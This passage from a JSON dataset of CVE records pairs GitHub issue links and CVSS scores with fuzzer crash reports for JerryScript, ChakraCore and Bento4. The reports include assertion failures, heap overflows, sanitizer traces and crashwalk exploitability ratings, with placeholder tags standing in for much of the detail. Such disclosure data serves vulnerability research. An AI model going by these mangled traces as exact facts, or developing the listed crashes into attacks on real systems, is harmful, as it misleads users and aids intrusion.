PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG SUMMARY: APITAG stack overflow PATHTAG ecma_regexp_match NUMBERTAG ABORTING Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55506. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55507. "severity": "CRITICAL",
  55508. "baseScore": 9.8,
  55509. "impactScore": 5.9,
  55510. "exploitabilityScore": 3.9
  55511. },
  55512. {
  55513. "CVE_ID": "CVE-2020-23308",
  55514. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3819",
  55515. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3819",
  55516. "Repo_new": "jerryscript-project/jerryscript",
  55517. "Issue_Created_At": "2020-05-31T13:53:00Z",
  55518. "description": "ICE: Assertion 'context_p >stack_top_uint8 == LEXER_EXPRESSION_START' failed at PATHTAG APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55520. "severity": "HIGH",
  55521. "baseScore": 7.5,
  55522. "impactScore": 3.6,
  55523. "exploitabilityScore": 3.9
  55524. },
  55525. {
  55526. "CVE_ID": "CVE-2020-23309",
  55527. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3820",
  55528. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3820",
  55529. "Repo_new": "jerryscript-project/jerryscript",
  55530. "Issue_Created_At": "2020-05-31T14:20:41Z",
  55531. "description": "Assertion 'context_p >stack_depth == context_p >context_stack_depth' in parser_parse_statements. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55532. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55533. "severity": "HIGH",
  55534. "baseScore": 7.5,
  55535. "impactScore": 3.6,
  55536. "exploitabilityScore": 3.9
  55537. },
  55538. {
  55539. "CVE_ID": "CVE-2020-23310",
  55540. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3821",
  55541. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3821",
  55542. "Repo_new": "jerryscript-project/jerryscript",
  55543. "Issue_Created_At": "2020-06-01T03:00:22Z",
  55544. "description": "Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55545. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55546. "severity": "HIGH",
  55547. "baseScore": 7.5,
  55548. "impactScore": 3.6,
  55549. "exploitabilityScore": 3.9
  55550. },
  55551. {
  55552. "CVE_ID": "CVE-2020-23311",
  55553. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3822",
  55554. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3822",
  55555. "Repo_new": "jerryscript-project/jerryscript",
  55556. "Issue_Created_At": "2020-06-01T03:10:23Z",
  55557. "description": "Assertion 'context_p APITAG == LEXER_RIGHT_BRACE || context_p APITAG == LEXER_ASSIGN || context_p APITAG == LEXER_COMMA' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55559. "severity": "HIGH",
  55560. "baseScore": 7.5,
  55561. "impactScore": 3.6,
  55562. "exploitabilityScore": 3.9
  55563. },
  55564. {
  55565. "CVE_ID": "CVE-2020-23312",
  55566. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3824",
  55567. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3824",
  55568. "Repo_new": "jerryscript-project/jerryscript",
  55569. "Issue_Created_At": "2020-06-01T04:16:48Z",
  55570. "description": "Assertion APITAG & PARSER_SCANNING_SUCCESSFUL' in parser_parse_source. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55572. "severity": "HIGH",
  55573. "baseScore": 7.5,
  55574. "impactScore": 3.6,
  55575. "exploitabilityScore": 3.9
  55576. },
  55577. {
  55578. "CVE_ID": "CVE-2020-23313",
  55579. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3823",
  55580. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3823",
  55581. "Repo_new": "jerryscript-project/jerryscript",
  55582. "Issue_Created_At": "2020-06-01T03:58:55Z",
  55583. "description": "Assertion 'scope_stack_p > context_p >scope_stack_p' in scanner_literal_is_created. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55584. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55585. "severity": "HIGH",
  55586. "baseScore": 7.5,
  55587. "impactScore": 3.6,
  55588. "exploitabilityScore": 3.9
  55589. },
  55590. {
  55591. "CVE_ID": "CVE-2020-23314",
  55592. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3825",
  55593. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3825",
  55594. "Repo_new": "jerryscript-project/jerryscript",
  55595. "Issue_Created_At": "2020-06-01T04:41:43Z",
  55596. "description": "Assertion 'block_found' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55598. "severity": "HIGH",
  55599. "baseScore": 7.5,
  55600. "impactScore": 3.6,
  55601. "exploitabilityScore": 3.9
  55602. },
  55603. {
  55604. "CVE_ID": "CVE-2020-23315",
  55605. "Issue_Url_old": "https://github.com/microsoft/ChakraCore/issues/6453",
  55606. "Issue_Url_new": "https://github.com/chakra-core/chakracore/issues/6453",
  55607. "Repo_new": "chakra-core/chakracore",
  55608. "Issue_Created_At": "2020-06-01T09:03:35Z",
  55609. "description": "APITAG in APITAG ERRORTAG",
  55610. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55611. "severity": "HIGH",
  55612. "baseScore": 7.5,
  55613. "impactScore": 3.6,
  55614. "exploitabilityScore": 3.9
  55615. },
  55616. {
  55617. "CVE_ID": "CVE-2020-23319",
  55618. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3834",
  55619. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3834",
  55620. "Repo_new": "jerryscript-project/jerryscript",
  55621. "Issue_Created_At": "2020-06-03T03:42:30Z",
  55622. "description": "Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE (flags >> CBC_STACK_ADJUST_SHIFT)) APITAG stack_depth' in APITAG APITAG revision a NUMBERTAG e NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55623. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55624. "severity": "HIGH",
  55625. "baseScore": 7.5,
  55626. "impactScore": 3.6,
  55627. "exploitabilityScore": 3.9
  55628. },
  55629. {
  55630. "CVE_ID": "CVE-2020-23320",
  55631. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3835",
  55632. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3835",
  55633. "Repo_new": "jerryscript-project/jerryscript",
  55634. "Issue_Created_At": "2020-06-03T04:04:08Z",
  55635. "description": "Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' in APITAG APITAG revision a NUMBERTAG e NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55636. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55637. "severity": "HIGH",
  55638. "baseScore": 7.5,
  55639. "impactScore": 3.6,
  55640. "exploitabilityScore": 3.9
  55641. },
  55642. {
  55643. "CVE_ID": "CVE-2020-23321",
  55644. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3870",
  55645. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3870",
  55646. "Repo_new": "jerryscript-project/jerryscript",
  55647. "Issue_Created_At": "2020-06-06T14:03:56Z",
  55648. "description": "heap buffer overflow in lit_read_code_unit_from_utf8. APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG",
  55649. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55650. "severity": "CRITICAL",
  55651. "baseScore": 9.8,
  55652. "impactScore": 5.9,
  55653. "exploitabilityScore": 3.9
  55654. },
  55655. {
  55656. "CVE_ID": "CVE-2020-23322",
  55657. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3869",
  55658. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3869",
  55659. "Repo_new": "jerryscript-project/jerryscript",
  55660. "Issue_Created_At": "2020-06-06T13:55:33Z",
  55661. "description": "Assertion 'context_p APITAG == LEXER_RIGHT_BRACE || context_p APITAG == LEXER_ASSIGN || context_p APITAG == LEXER_COMMA' in APITAG APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55662. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55663. "severity": "HIGH",
  55664. "baseScore": 7.5,
  55665. "impactScore": 3.6,
  55666. "exploitabilityScore": 3.9
  55667. },
  55668. {
  55669. "CVE_ID": "CVE-2020-23323",
  55670. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3871",
  55671. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3871",
  55672. "Repo_new": "jerryscript-project/jerryscript",
  55673. "Issue_Created_At": "2020-06-07T10:51:46Z",
  55674. "description": "heap buffer overflow in re_parse_char_escape. APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55675. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55676. "severity": "CRITICAL",
  55677. "baseScore": 9.8,
  55678. "impactScore": 5.9,
  55679. "exploitabilityScore": 3.9
  55680. },
  55681. {
  55682. "CVE_ID": "CVE-2020-23330",
  55683. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/511",
  55684. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/511",
  55685. "Repo_new": "axiomatic-systems/bento4",
  55686. "Issue_Created_At": "2020-05-16T12:08:52Z",
  55687. "description": "SEGV by a READ memory access (address points to the zero page). Command: ./mp NUMBERTAG aac APITAG /tmp/out.aac APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f bp NUMBERTAG ffc6b NUMBERTAG a3d0 sp NUMBERTAG ffc6b NUMBERTAG a NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG e in APITAG int, unsigned int&) ( PATHTAG NUMBERTAG d7f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG a NUMBERTAG e in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG a NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG f1e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG int, unsigned int NUMBERTAG ABORTING Information provided by crashwalk: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: PROBABLY_NOT_EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG int, unsigned int NUMBERTAG f9b NUMBERTAG in PATHTAG Disassembly NUMBERTAG f9b NUMBERTAG jb NUMBERTAG f9b NUMBERTAG APITAG NUMBERTAG f9b NUMBERTAG test esi,esi NUMBERTAG f9b6b: je NUMBERTAG f9b NUMBERTAG APITAG NUMBERTAG f9b6d: mov rax,QWORD PTR [rdi NUMBERTAG f9b NUMBERTAG lea ecx,[rsi NUMBERTAG f9b NUMBERTAG mov ecx,DWORD PTR [rax+rc NUMBERTAG f9b NUMBERTAG or eax,ea NUMBERTAG f9b NUMBERTAG mov DWORD PTR [rdx],ec NUMBERTAG f9b7b: ret NUMBERTAG f9b7c: nop DWORD PTR [ra NUMBERTAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG f9b NUMBERTAG in PATHTAG APITAG NUMBERTAG ce NUMBERTAG in PATHTAG APITAG NUMBERTAG bd NUMBERTAG in PATHTAG main NUMBERTAG ab NUMBERTAG c: in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG c0 rc NUMBERTAG rd NUMBERTAG fffffffdb NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG a0 rbp NUMBERTAG rsp NUMBERTAG fffffffdae8 r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG a r NUMBERTAG r NUMBERTAG fffffffdb NUMBERTAG r NUMBERTAG fffffffdbf0 r NUMBERTAG rip NUMBERTAG f9b NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation near NULL on source operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. END SUMMARY",
  55688. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55689. "severity": "HIGH",
  55690. "baseScore": 7.5,
  55691. "impactScore": 3.6,
  55692. "exploitabilityScore": 3.9
  55693. },
  55694. {
  55695. "CVE_ID": "CVE-2020-23331",
  55696. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/509",
  55697. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/509",
  55698. "Repo_new": "axiomatic-systems/bento4",
  55699. "Issue_Created_At": "2020-05-16T11:29:41Z",
  55700. "description": "SEGV by a READ memory access in APITAG Command line: ./mp NUMBERTAG aac APITAG /tmp/out.aac Information provided by crashwalk: CRASH SUMMARY Filename: psym APITAG SHA1: APITAG Classification: PROBABLY_NOT_EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG NUMBERTAG de NUMBERTAG in PATHTAG Disassembly NUMBERTAG de NUMBERTAG test rbx,rb NUMBERTAG de NUMBERTAG je NUMBERTAG de NUMBERTAG APITAG NUMBERTAG de NUMBERTAG nop WORD PTR [rax+ra NUMBERTAG de NUMBERTAG mov rdi,QWORD PTR [rb NUMBERTAG de NUMBERTAG mov rsi,rbp NUMBERTAG de NUMBERTAG mov rax,QWORD PTR [rdi NUMBERTAG de NUMBERTAG call QWORD PTR [ra NUMBERTAG de NUMBERTAG c: mov rbx,QWORD PTR [rb NUMBERTAG de NUMBERTAG test rbx,rb NUMBERTAG de NUMBERTAG jne NUMBERTAG de NUMBERTAG APITAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG de NUMBERTAG in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG de NUMBERTAG c: in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG e NUMBERTAG fc: in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG c NUMBERTAG e7: in PATHTAG APITAG NUMBERTAG b4eef: in PATHTAG APITAG NUMBERTAG b7b5f: in PATHTAG APITAG NUMBERTAG bbf0d: in PATHTAG main NUMBERTAG ab4d2: in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG e4e0 rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG f5a0 rdi NUMBERTAG rbp NUMBERTAG f5a0 rsp NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG f5d0 r NUMBERTAG c r NUMBERTAG r NUMBERTAG ffff7d NUMBERTAG be0 r NUMBERTAG r NUMBERTAG f5a0 r NUMBERTAG f NUMBERTAG r NUMBERTAG d NUMBERTAG rip NUMBERTAG de NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation near NULL on source operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. END SUMMARY Information provided by address sanitizer: APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG b NUMBERTAG bp NUMBERTAG ffee NUMBERTAG cd NUMBERTAG sp NUMBERTAG ffee NUMBERTAG cd7d0 T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG b NUMBERTAG in APITAG ) const ( PATHTAG NUMBERTAG e6e in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG e6e in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ( PATHTAG NUMBERTAG dd NUMBERTAG in APITAG int, unsigned short, unsigned short, unsigned short, char const , APITAG ) ( PATHTAG NUMBERTAG a in APITAG ( PATHTAG NUMBERTAG a NUMBERTAG e in APITAG int) ( PATHTAG NUMBERTAG b2 in main ( PATHTAG NUMBERTAG f NUMBERTAG df1e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG ) const NUMBERTAG ABORTING",
  55701. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55702. "severity": "HIGH",
  55703. "baseScore": 7.5,
  55704. "impactScore": 3.6,
  55705. "exploitabilityScore": 3.9
  55706. },
  55707. {
  55708. "CVE_ID": "CVE-2020-23332",
  55709. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/510",
  55710. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/510",
  55711. "Repo_new": "axiomatic-systems/bento4",
  55712. "Issue_Created_At": "2020-05-16T11:33:57Z",
  55713. "description": "Heap buffer overflow in APITAG Command: ./mp NUMBERTAG aac APITAG /tmp/out.aac Information provided by address sanitizer: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b1 at pc NUMBERTAG e NUMBERTAG a0 bp NUMBERTAG fffb3ea0f NUMBERTAG sp NUMBERTAG fffb3ea NUMBERTAG d0 WRITE of size NUMBERTAG at NUMBERTAG b1 thread T NUMBERTAG e NUMBERTAG f in APITAG PATHTAG NUMBERTAG c3ccb in APITAG , unsigned int, unsigned int&) ( PATHTAG NUMBERTAG a in APITAG , unsigned int) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG ccec in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d3a NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f3d NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG NUMBERTAG b1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in operator APITAG long) PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Information provided by crashwalk: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: operator new(unsigned long NUMBERTAG ffff7e5f1d9: in PATHTAG Disassembly NUMBERTAG ffff7bef3da: xor edx,ed NUMBERTAG ffff7bef3dc: mov rsi,r NUMBERTAG ffff7bef3df: mov edi NUMBERTAG ffff7bef3e4: mov ea NUMBERTAG e NUMBERTAG ffff7bef3e9: syscall NUMBERTAG ffff7bef3eb: mov rax,QWORD PTR [rsp NUMBERTAG ffff7bef3f3: xor rax,QWORD PTR fs NUMBERTAG ffff7bef3fc: jne NUMBERTAG ffff7bef NUMBERTAG APITAG NUMBERTAG ffff7bef3fe: mov eax,r8d NUMBERTAG ffff7bef NUMBERTAG add rsp NUMBERTAG Stack Head NUMBERTAG entries): __GI_raise NUMBERTAG ffff7bef3eb: in (BL) __GI_abort NUMBERTAG ffff7bce NUMBERTAG in (BL) __libc_message NUMBERTAG ffff7c NUMBERTAG e: in (BL) malloc_printerr NUMBERTAG ffff7c NUMBERTAG dc: in (BL) _int_malloc NUMBERTAG ffff7c NUMBERTAG a: in (BL) __GI___libc_malloc NUMBERTAG ffff7c NUMBERTAG in (BL) operator NUMBERTAG ffff7e5f1d9: in PATHTAG APITAG NUMBERTAG bbc NUMBERTAG in PATHTAG APITAG NUMBERTAG f3fee: in PATHTAG APITAG NUMBERTAG ccadd: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG dbbfd: in PATHTAG APITAG NUMBERTAG cb NUMBERTAG in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG ffff7a NUMBERTAG rc NUMBERTAG ffff7bef3eb rd NUMBERTAG rsi NUMBERTAG fffffffce NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffce NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffce NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffd0b0 r NUMBERTAG r NUMBERTAG ffff7ffb NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff7bef3eb efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Heap error Short description: ERRORTAG NUMBERTAG Explanation: The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as APITAG etc. Since heap errors might include buffer overflows, use after free situations, etc. they are generally considered exploitable. END SUMMARY",
  55714. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55715. "severity": "HIGH",
  55716. "baseScore": 7.5,
  55717. "impactScore": 3.6,
  55718. "exploitabilityScore": 3.9
  55719. },
  55720. {
  55721. "CVE_ID": "CVE-2020-23333",
  55722. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/507",
  55723. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/507",
  55724. "Repo_new": "axiomatic-systems/bento4",
  55725. "Issue_Created_At": "2020-05-16T07:46:13Z",
